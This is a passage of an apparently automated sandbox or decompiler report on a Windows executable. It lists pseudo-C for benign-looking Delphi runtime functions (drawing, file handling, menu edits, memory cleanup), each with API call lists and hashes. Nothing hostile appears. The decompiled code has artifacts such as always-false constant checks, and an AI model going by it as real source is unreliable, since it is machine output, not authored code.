                                                                                						}
                                                                                						_t159 = _t159 + 1;
                                                                                						_t75 =  &(_v44.right);
                                                                                						 *_t75 = _v44.right - 1;
                                                                                					} while ( *_t75 != 0);
                                                                                					goto L27;
                                                                                				}
                                                                                				_t160 = 0;
                                                                                				if(_t134 != 0) {
                                                                                					_t160 = E00414000(_t78, _t134);
                                                                                					if(_t160 < 0) {
                                                                                						_t160 = 0;
                                                                                					}
                                                                                				}
                                                                                				 *_t163 =  *((intOrPtr*)( *((intOrPtr*)(_t161 + 0x198)) + 8));
                                                                                				if(_t160 <  *_t163) {
                                                                                					do {
                                                                                						_t136 = E00413FA4( *((intOrPtr*)(_t161 + 0x198)), _t160);
                                                                                						if( *((char*)(_t136 + 0x57)) != 0 || ( *(_t136 + 0x1c) & 0x00000010) != 0 && ( *(_t136 + 0x51) & 0x00000004) == 0) {
                                                                                							E00412984( *((intOrPtr*)(_t136 + 0x40)),  *((intOrPtr*)(_t136 + 0x40)) +  *(_t136 + 0x48),  *((intOrPtr*)(_t136 + 0x44)),  &(_v44.bottom),  *((intOrPtr*)(_t136 + 0x44)) +  *(_t136 + 0x4c));
                                                                                							if(RectVisible(_t162,  &(_v44.top)) != 0) {
                                                                                								if(( *(_t161 + 0x54) & 0x00000080) != 0) {
                                                                                									 *(_t136 + 0x54) =  *(_t136 + 0x54) | 0x00000080;
                                                                                								}
                                                                                								_v60.top = SaveDC(_t162);
                                                                                								E00433FDC(_t162,  *((intOrPtr*)(_t136 + 0x44)),  *((intOrPtr*)(_t136 + 0x40)));
                                                                                								IntersectClipRect(_t162, 0, 0,  *(_t136 + 0x48),  *(_t136 + 0x4c));
                                                                                								E00436848(_t136, _t162, 0xf, 0);
                                                                                								RestoreDC(_t162, _v80);
                                                                                								 *(_t136 + 0x54) =  *(_t136 + 0x54) & 0x0000ff7f;
                                                                                							}
                                                                                						}
                                                                                						_t160 = _t160 + 1;
                                                                                					} while (_t160 < _v60.top);
                                                                                				}
                                                                                			}

















                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                                • String ID:
                                                                                • API String ID: 375863564-0
                                                                                • Opcode ID: 90185039d72083636e0d9542b1f8aeae172046c567a2dd13c7c3ec0bbf9e28ba
                                                                                • Instruction ID: ceb3e369153146217064650c0b56690f9fbafe8079a4cddf4b1ed266614cb7ac
                                                                                • Opcode Fuzzy Hash: 90185039d72083636e0d9542b1f8aeae172046c567a2dd13c7c3ec0bbf9e28ba
                                                                                • Instruction Fuzzy Hash: F4517F712042449FDB18EF29C8C4B9B77E8AF49308F04545EFD89CB296D678EC45CB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 70%
                                                                                			E00402B18(void** __eax) {
                                                                                				long _t29;
                                                                                				void* _t31;
                                                                                				long _t34;
                                                                                				void* _t38;
                                                                                				void* _t40;
                                                                                				long _t41;
                                                                                				int _t44;
                                                                                				void* _t46;
                                                                                				long _t54;
                                                                                				long _t55;
                                                                                				void* _t58;
                                                                                				void** _t59;
                                                                                				DWORD* _t60;
                                                                                
                                                                                				_t59 = __eax;
                                                                                				 *((intOrPtr*)(__eax + 0xc)) = 0;
                                                                                				 *((intOrPtr*)(__eax + 0x10)) = 0;
                                                                                				if(0xffffffffffff284f == 0) {
                                                                                					_t29 = 0x80000000;
                                                                                					_t55 = 1;
                                                                                					_t54 = 3;
                                                                                					 *((intOrPtr*)(__eax + 0x1c)) = 0x402a6c;
                                                                                				} else {
                                                                                					if(0xffffffffffff284f == 0) {
                                                                                						_t29 = 0x40000000;
                                                                                						_t55 = 1;
                                                                                						_t54 = 2;
                                                                                					} else {
                                                                                						if(0xffffffffffff284f != 0) {
                                                                                							return 0xffffffffffff284d;
                                                                                						}
                                                                                						_t29 = 0xc0000000;
                                                                                						_t55 = 1;
                                                                                						_t54 = 3;
                                                                                					}
                                                                                					_t59[7] = E00402AAC;
                                                                                				}
                                                                                				_t59[9] = E00402AF8;
                                                                                				_t59[8] = E00402AA8;
                                                                                				if(_t59[0x12] == 0) {
                                                                                					_t59[2] = 0x80;
                                                                                					_t59[9] = E00402AA8;
                                                                                					_t59[5] =  &(_t59[0x53]);
                                                                                					if(_t59[1] == 0xd7b2) {
                                                                                						if(_t59 != 0x4873e4) {
                                                                                							_push(0xfffffff5);
                                                                                						} else {
                                                                                							_push(0xfffffff4);
                                                                                						}
                                                                                					} else {
                                                                                						_push(0xfffffff6);
                                                                                					}
                                                                                					_t31 = GetStdHandle();
                                                                                					if(_t31 == 0xffffffff) {
                                                                                						goto L37;
                                                                                					}
                                                                                					 *_t59 = _t31;
                                                                                					goto L30;
                                                                                				} else {
                                                                                					_t38 = CreateFileA( &(_t59[0x12]), _t29, _t55, 0, _t54, 0x80, 0);
                                                                                					if(_t38 == 0xffffffff) {
                                                                                						L37:
                                                                                						_t59[1] = 0xd7b0;
                                                                                						return GetLastError();
                                                                                					}
                                                                                					 *_t59 = _t38;
                                                                                					if(_t59[1] != 0xd7b3) {
                                                                                						L30:
                                                                                						if(_t59[1] == 0xd7b1) {
                                                                                							L34:
                                                                                							return 0;
                                                                                						}
                                                                                						_t34 = GetFileType( *_t59);
                                                                                						if(_t34 == 0) {
                                                                                							CloseHandle( *_t59);
                                                                                							_t59[1] = 0xd7b0;
                                                                                							return 0x69;
                                                                                						}
                                                                                						if(_t34 == 2) {
                                                                                							_t59[8] = E00402AAC;
                                                                                						}
                                                                                						goto L34;
                                                                                					}
                                                                                					_t59[1] = _t59[1] - 1;
                                                                                					_t40 = GetFileSize( *_t59, 0) + 1;
                                                                                					if(_t40 == 0) {
                                                                                						goto L37;
                                                                                					}
                                                                                					_t41 = _t40 - 0x81;
                                                                                					if(_t41 < 0) {
                                                                                						_t41 = 0;
                                                                                					}
                                                                                					if(SetFilePointer( *_t59, _t41, 0, 0) + 1 == 0) {
                                                                                						goto L37;
                                                                                					} else {
                                                                                						_t44 = ReadFile( *_t59,  &(_t59[0x53]), 0x80, _t60, 0);
                                                                                						_t58 = 0;
                                                                                						if(_t44 != 1) {
                                                                                							goto L37;
                                                                                						}
                                                                                						_t46 = 0;
                                                                                						while(_t46 < _t58) {
                                                                                							if( *((char*)(_t59 + _t46 + 0x14c)) == 0xe) {
                                                                                								if(SetFilePointer( *_t59, _t46 - _t58, 0, 2) + 1 == 0 || SetEndOfFile( *_t59) != 1) {
                                                                                									goto L37;
                                                                                								} else {
                                                                                									goto L30;
                                                                                								}
                                                                                							}
                                                                                							_t46 = _t46 + 1;
                                                                                						}
                                                                                						goto L30;
                                                                                					}
                                                                                				}
                                                                                			}

















                                                                                APIs
                                                                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402BA0
                                                                                • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402BC4
                                                                                • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402BE0
                                                                                • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000), ref: 00402C01
                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00402C2A
                                                                                • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00402C38
                                                                                • GetStdHandle.KERNEL32(000000F5), ref: 00402C73
                                                                                • GetFileType.KERNEL32(?,000000F5), ref: 00402C89
                                                                                • CloseHandle.KERNEL32(?,?,000000F5), ref: 00402CA4
                                                                                • GetLastError.KERNEL32(000000F5), ref: 00402CBC
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                • String ID:
                                                                                • API String ID: 1694776339-0
                                                                                • Opcode ID: 64ad8ea4c2b16f1e38e7f37a0d7e461a096d8fcf753019cf723aaf91f24c5d7a
                                                                                • Instruction ID: c7a4ebb683dc642720d6c14f3ce292b160b37a6f3a2b11c4ffb55bc8aa658509
                                                                                • Opcode Fuzzy Hash: 64ad8ea4c2b16f1e38e7f37a0d7e461a096d8fcf753019cf723aaf91f24c5d7a
                                                                                • Instruction Fuzzy Hash: 1D41A170108700AAF7309F24CB0DB2B76E5AB41754F208A3FE596B66E0E7FDA841974D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00450F98(intOrPtr _a4) {
                                                                                				intOrPtr _t27;
                                                                                				struct HMENU__* _t48;
                                                                                
                                                                                				_t27 =  *((intOrPtr*)(_a4 - 4));
                                                                                				if( *((char*)(_t27 + 0x229)) != 0) {
                                                                                					_t27 =  *((intOrPtr*)(_a4 - 4));
                                                                                					if(( *(_t27 + 0x228) & 0x00000001) != 0) {
                                                                                						_t27 =  *((intOrPtr*)(_a4 - 4));
                                                                                						if( *((char*)(_t27 + 0x22f)) != 1) {
                                                                                							_t48 = GetSystemMenu(E0043BD14( *((intOrPtr*)(_a4 - 4))), 0);
                                                                                							if( *((char*)( *((intOrPtr*)(_a4 - 4)) + 0x229)) == 3) {
                                                                                								DeleteMenu(_t48, 0xf130, 0);
                                                                                								DeleteMenu(_t48, 7, 0x400);
                                                                                								DeleteMenu(_t48, 5, 0x400);
                                                                                								DeleteMenu(_t48, 0xf030, 0);
                                                                                								DeleteMenu(_t48, 0xf020, 0);
                                                                                								DeleteMenu(_t48, 0xf000, 0);
                                                                                								return DeleteMenu(_t48, 0xf120, 0);
                                                                                							}
                                                                                							if(( *( *((intOrPtr*)(_a4 - 4)) + 0x228) & 0x00000002) == 0) {
                                                                                								EnableMenuItem(_t48, 0xf020, 1);
                                                                                							}
                                                                                							_t27 =  *((intOrPtr*)(_a4 - 4));
                                                                                							if(( *(_t27 + 0x228) & 0x00000004) == 0) {
                                                                                								return EnableMenuItem(_t48, 0xf030, 1);
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				return _t27;
                                                                                			}






                                                                                APIs
                                                                                • GetSystemMenu.USER32(00000000,00000000), ref: 00450FE3
                                                                                • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00451001
                                                                                • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0045100E
                                                                                • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0045101B
                                                                                • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00451028
                                                                                • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00451035
                                                                                • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00451042
                                                                                • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 0045104F
                                                                                • EnableMenuItem.USER32 ref: 0045106D
                                                                                • EnableMenuItem.USER32 ref: 00451089
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Menu$Delete$EnableItem$System
                                                                                • String ID:
                                                                                • API String ID: 3985193851-0
                                                                                • Opcode ID: ffa875bfd80362b43f77e1a8893f16d689354b82d48917cc9e02a79fef38a4fe
                                                                                • Instruction ID: 0d157b5141c4730fac339518274e379f240c5fea68c2b1bb01df9476f5004e56
                                                                                • Opcode Fuzzy Hash: ffa875bfd80362b43f77e1a8893f16d689354b82d48917cc9e02a79fef38a4fe
                                                                                • Instruction Fuzzy Hash: 49218B703803447AF730AA24DC8EF697BD85F04B19F0180A5BA457F2E3C6B8E9D0964C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 71%
                                                                                			E00401B3C() {
                                                                                				void* _t2;
                                                                                				void* _t3;
                                                                                				void* _t14;
                                                                                				intOrPtr* _t19;
                                                                                				intOrPtr _t23;
                                                                                				intOrPtr _t26;
                                                                                				intOrPtr _t28;
                                                                                
                                                                                				_t26 = _t28;
                                                                                				if( *0x4875bc == 0) {
                                                                                					return _t2;
                                                                                				} else {
                                                                                					_push(_t26);
                                                                                					_push("�1!");
                                                                                					_push( *[fs:edx]);
                                                                                					 *[fs:edx] = _t28;
                                                                                					if( *0x487049 != 0) {
                                                                                						_push(0x4875c4);
                                                                                						L004013D4();
                                                                                					}
                                                                                					 *0x4875bc = 0;
                                                                                					_t3 =  *0x48761c; // 0x7528d0
                                                                                					LocalFree(_t3);
                                                                                					 *0x48761c = 0;
                                                                                					_t19 =  *0x4875e4; // 0x753f04
                                                                                					while(_t19 != 0x4875e4) {
                                                                                						VirtualFree( *(_t19 + 8), 0, 0x8000);
                                                                                						_t19 =  *_t19;
                                                                                					}
                                                                                					E0040143C(0x4875e4);
                                                                                					E0040143C(0x4875f4);
                                                                                					E0040143C(0x487620);
                                                                                					_t14 =  *0x4875dc; // 0x7538d0
                                                                                					while(_t14 != 0) {
                                                                                						 *0x4875dc =  *_t14;
                                                                                						LocalFree(_t14);
                                                                                						_t14 =  *0x4875dc; // 0x7538d0
                                                                                					}
                                                                                					_pop(_t23);
                                                                                					 *[fs:eax] = _t23;
                                                                                					_push(0x401c19);
                                                                                					if( *0x487049 != 0) {
                                                                                						_push(0x4875c4);
                                                                                						L004013DC();
                                                                                					}
                                                                                					_push(0x4875c4);
                                                                                					L004013E4();
                                                                                					return 0;
                                                                                				}
                                                                                			}











                                                                                APIs
                                                                                • RtlEnterCriticalSection.KERNEL32(004875C4,00000000,1!), ref: 00401B69
                                                                                • LocalFree.KERNEL32(007528D0,00000000,1!), ref: 00401B7B
                                                                                • VirtualFree.KERNEL32(?,00000000,00008000,007528D0,00000000,1!), ref: 00401B9A
                                                                                • LocalFree.KERNEL32(007538D0,?,00000000,00008000,007528D0,00000000,1!), ref: 00401BD9
                                                                                • RtlLeaveCriticalSection.KERNEL32(004875C4,00401C19,007528D0,00000000,1!), ref: 00401C02
                                                                                • RtlDeleteCriticalSection.KERNEL32(004875C4,00401C19,007528D0,00000000,1!), ref: 00401C0C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                • String ID: 1!$>u
                                                                                • API String ID: 3782394904-3870673495
                                                                                • Opcode ID: c9870644c7d403ba758099fed721d5d9921784339dc3ab848aa4989e93f91077
                                                                                • Instruction ID: caa9c97ba3000af0647512c36d6f90ab019626e33afd24c9466f0402b3c2e7e1
                                                                                • Opcode Fuzzy Hash: c9870644c7d403ba758099fed721d5d9921784339dc3ab848aa4989e93f91077
                                                                                • Instruction Fuzzy Hash: DF115E7464C6406EE711BB66ECB2B2E7A959745708F60887FF500B6AF2D67CD840CB2C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00409FFC(void* __edi) {
                                                                                				void _v1024;
                                                                                				char _v1088;
                                                                                				long _v1092;
                                                                                				void* _t10;
                                                                                				char* _t12;
                                                                                				intOrPtr _t14;
                                                                                				intOrPtr _t16;
                                                                                				intOrPtr _t22;
                                                                                				long _t26;
                                                                                				void* _t34;
                                                                                
                                                                                				E00409E74(_t10,  &_v1024, _t34, 0x400);
                                                                                				_t12 =  *0x486cc4; // 0x487048
                                                                                				if( *_t12 == 0) {
                                                                                					_t14 =  *0x486aa8; // 0x4074e4
                                                                                					_t7 = _t14 + 4; // 0xffe8
                                                                                					_t16 =  *0x487714; // 0x400000
                                                                                					LoadStringA(E00405A84(_t16),  *_t7,  &_v1088, 0x40);
                                                                                					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
                                                                                				}
                                                                                				_t22 =  *0x486af0; // 0x487218
                                                                                				E00402D0C(_t22);
                                                                                				_t26 = E00408B40( &_v1024, __edi);
                                                                                				WriteFile(GetStdHandle(0xfffffff5),  &_v1024, _t26,  &_v1092, 0);
                                                                                				return WriteFile(GetStdHandle(0xfffffff5), 0x40a0ac, 2,  &_v1092, 0);
                                                                                			}














                                                                                APIs
                                                                                  • Part of subcall function 00409E74: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00409E91
                                                                                  • Part of subcall function 00409E74: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00409EB5
                                                                                  • Part of subcall function 00409E74: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00409ED0
                                                                                  • Part of subcall function 00409E74: LoadStringA.USER32 ref: 00409F66
                                                                                • GetStdHandle.KERNEL32(000000F5,?,00000000,?,00000000), ref: 0040A03C
                                                                                • WriteFile.KERNEL32(00000000,000000F5,?,00000000,?,00000000), ref: 0040A042
                                                                                • GetStdHandle.KERNEL32(000000F5,0040A0AC,00000002,?,00000000,00000000,000000F5,?,00000000,?,00000000), ref: 0040A057
                                                                                • WriteFile.KERNEL32(00000000,000000F5,0040A0AC,00000002,?,00000000,00000000,000000F5,?,00000000,?,00000000), ref: 0040A05D
                                                                                • LoadStringA.USER32 ref: 0040A07F
                                                                                • MessageBoxA.USER32 ref: 0040A095
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: File$HandleLoadModuleNameStringWrite$MessageQueryVirtual
                                                                                • String ID: HpH$t@
                                                                                • API String ID: 1802973324-3679897340
                                                                                • Opcode ID: e34cdb547f107c02dac129002a15a92a112cff8d4a5bdf1f3d81973431fedd85
                                                                                • Instruction ID: 7d280b318de20257b267b25c9c6113f965e65ab47ef070ee4e671aee89c3a216
                                                                                • Opcode Fuzzy Hash: e34cdb547f107c02dac129002a15a92a112cff8d4a5bdf1f3d81973431fedd85
                                                                                • Instruction Fuzzy Hash: 7501A1B2244305BAD700FB64CC42F9B77ACAB05704F408A3E7355F60E2DA78E9008B2B
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E004352BC(intOrPtr* __eax, int __ecx, int __edx) {
                                                                                				char _t62;
                                                                                				signed int _t64;
                                                                                				signed int _t65;
                                                                                				signed char _t107;
                                                                                				intOrPtr _t113;
                                                                                				intOrPtr _t114;
                                                                                				int _t117;
                                                                                				intOrPtr* _t118;
                                                                                				int _t119;
                                                                                				int* _t121;
                                                                                
                                                                                				 *_t121 = __ecx;
                                                                                				_t117 = __edx;
                                                                                				_t118 = __eax;
                                                                                				if(__edx ==  *_t121) {
                                                                                					L29:
                                                                                					_t62 =  *0x435468; // 0x0
                                                                                					 *((char*)(_t118 + 0x98)) = _t62;
                                                                                					return _t62;
                                                                                				}
                                                                                				if(( *(__eax + 0x1c) & 0x00000001) == 0) {
                                                                                					_t107 =  *0x435460; // 0x1f
                                                                                				} else {
                                                                                					_t107 =  *((intOrPtr*)(__eax + 0x98));
                                                                                				}
                                                                                				if((_t107 & 0x00000001) == 0) {
                                                                                					_t119 =  *(_t118 + 0x40);
                                                                                				} else {
                                                                                					_t119 = MulDiv( *(_t118 + 0x40), _t117,  *_t121);
                                                                                				}
                                                                                				if((_t107 & 0x00000002) == 0) {
                                                                                					_t121[1] =  *(_t118 + 0x44);
                                                                                				} else {
                                                                                					_t121[1] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
                                                                                				}
                                                                                				if((_t107 & 0x00000004) == 0 || ( *(_t118 + 0x51) & 0x00000001) != 0) {
                                                                                					_t64 =  *(_t118 + 0x48);
                                                                                					_t121[2] = _t64;
                                                                                				} else {
                                                                                					if((_t107 & 0x00000001) == 0) {
                                                                                						_t64 = MulDiv( *(_t118 + 0x48), _t117,  *_t121);
                                                                                						_t121[2] = _t64;
                                                                                					} else {
                                                                                						_t64 = MulDiv( *(_t118 + 0x40) +  *(_t118 + 0x48), _t117,  *_t121) - _t119;
                                                                                						_t121[2] = _t64;
                                                                                					}
                                                                                				}
                                                                                				_t65 = _t64 & 0xffffff00 | (_t107 & 0x00000008) != 0x00000000;
                                                                                				if(_t65 == 0 || ( *(_t118 + 0x51) & 0x00000002) != 0) {
                                                                                					_t121[3] =  *(_t118 + 0x4c);
                                                                                				} else {
                                                                                					if(_t65 == 0) {
                                                                                						_t121[3] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
                                                                                					} else {
                                                                                						_t121[3] = MulDiv( *(_t118 + 0x44) +  *(_t118 + 0x4c), _t117,  *_t121) - _t121[1];
                                                                                					}
                                                                                				}
                                                                                				 *((intOrPtr*)( *_t118 + 0x84))(_t121[4], _t121[2]);
                                                                                				_t113 =  *0x435468; // 0x0
                                                                                				if(_t113 != (_t107 &  *0x435464)) {
                                                                                					 *(_t118 + 0x90) = MulDiv( *(_t118 + 0x90), _t117,  *_t121);
                                                                                				}
                                                                                				_t114 =  *0x435468; // 0x0
                                                                                				if(_t114 != (_t107 &  *0x43546c)) {
                                                                                					 *(_t118 + 0x94) = MulDiv( *(_t118 + 0x94), _t117,  *_t121);
                                                                                				}
                                                                                				if( *((char*)(_t118 + 0x59)) == 0 && (_t107 & 0x00000010) != 0) {
                                                                                					E0041EDEC( *((intOrPtr*)(_t118 + 0x68)), MulDiv(E0041EDD0( *((intOrPtr*)(_t118 + 0x68))), _t117,  *_t121));
                                                                                				}
                                                                                				goto L29;
                                                                                			}














                                                                                APIs
                                                                                • MulDiv.KERNEL32(?,?,?), ref: 004352F5
                                                                                • MulDiv.KERNEL32(?,?,?), ref: 0043530F
                                                                                • MulDiv.KERNEL32(?,?,?), ref: 0043533D
                                                                                • MulDiv.KERNEL32(?,?,?), ref: 00435353
                                                                                • MulDiv.KERNEL32(?,?,?), ref: 0043538B
                                                                                • MulDiv.KERNEL32(?,?,?), ref: 004353A3
                                                                                • MulDiv.KERNEL32(?,?,0000001F), ref: 004353ED
                                                                                • MulDiv.KERNEL32(?,?,0000001F), ref: 00435416
                                                                                • MulDiv.KERNEL32(00000000,?,0000001F), ref: 0043543C
                                                                                  • Part of subcall function 0041EDEC: MulDiv.KERNEL32(00000000,?,00000048), ref: 0041EDF9
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 435e03ab1caa1e1677467894ed5e915b6374115a8e24f0854a88f83eb046f16a
                                                                                • Instruction ID: 8953bc8b0a4d67b9433345c2c8a17991cd0cb88a4a3005cd9b45d3bc99294169
                                                                                • Opcode Fuzzy Hash: 435e03ab1caa1e1677467894ed5e915b6374115a8e24f0854a88f83eb046f16a
                                                                                • Instruction Fuzzy Hash: 405160B0208B40AFD720DF69C845B6BB7E9AF49344F08582EBDD6C7752C679E840CB19
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 39%
                                                                                			E00436150(void* __ebx, char __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
                                                                                				char _v5;
                                                                                				struct HWND__* _v12;
                                                                                				struct HDC__* _v16;
                                                                                				void* _v20;
                                                                                				intOrPtr _v24;
                                                                                				intOrPtr _v28;
                                                                                				int _v32;
                                                                                				int _v36;
                                                                                				int _t76;
                                                                                				intOrPtr _t82;
                                                                                				int _t85;
                                                                                				void* _t90;
                                                                                				int _t91;
                                                                                				void* _t94;
                                                                                				void* _t95;
                                                                                				intOrPtr _t96;
                                                                                
                                                                                				_t94 = _t95;
                                                                                				_t96 = _t95 + 0xffffffe0;
                                                                                				_v5 = __ecx;
                                                                                				_t76 =  *((intOrPtr*)( *__edx + 0x38))();
                                                                                				if(_v5 == 0) {
                                                                                					_push(__edx);
                                                                                					asm("movsd");
                                                                                					asm("movsd");
                                                                                					asm("movsd");
                                                                                					asm("movsd");
                                                                                					_pop(_t90);
                                                                                				} else {
                                                                                					_push(__edx);
                                                                                					asm("movsd");
                                                                                					asm("movsd");
                                                                                					asm("movsd");
                                                                                					asm("movsd");
                                                                                					_pop(_t90);
                                                                                				}
                                                                                				_v12 = GetDesktopWindow();
                                                                                				_v16 = GetDCEx(_v12, 0, 0x402);
                                                                                				_push(_t94);
                                                                                				_push(0x43626b);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t96;
                                                                                				_v20 = SelectObject(_v16, E0041F36C( *((intOrPtr*)(_t90 + 0x40))));
                                                                                				_t91 = _v36;
                                                                                				_t85 = _v32;
                                                                                				PatBlt(_v16, _t91 + _t76, _t85, _v28 - _t91 - _t76, _t76, 0x5a0049);
                                                                                				PatBlt(_v16, _v28 - _t76, _t85 + _t76, _t76, _v24 - _t85 - _t76, 0x5a0049);
                                                                                				PatBlt(_v16, _t91, _v24 - _t76, _v28 - _v36 - _t76, _t76, 0x5a0049);
                                                                                				PatBlt(_v16, _t91, _t85, _t76, _v24 - _v32 - _t76, 0x5a0049);
                                                                                				SelectObject(_v16, _v20);
                                                                                				_pop(_t82);
                                                                                				 *[fs:eax] = _t82;
                                                                                				_push(0x436272);
                                                                                				return ReleaseDC(_v12, _v16);
                                                                                			}




















                                                                                APIs
                                                                                • GetDesktopWindow.USER32 ref: 00436187
                                                                                • GetDCEx.USER32(?,00000000,00000402), ref: 0043619A
                                                                                • SelectObject.GDI32(?,00000000), ref: 004361BD
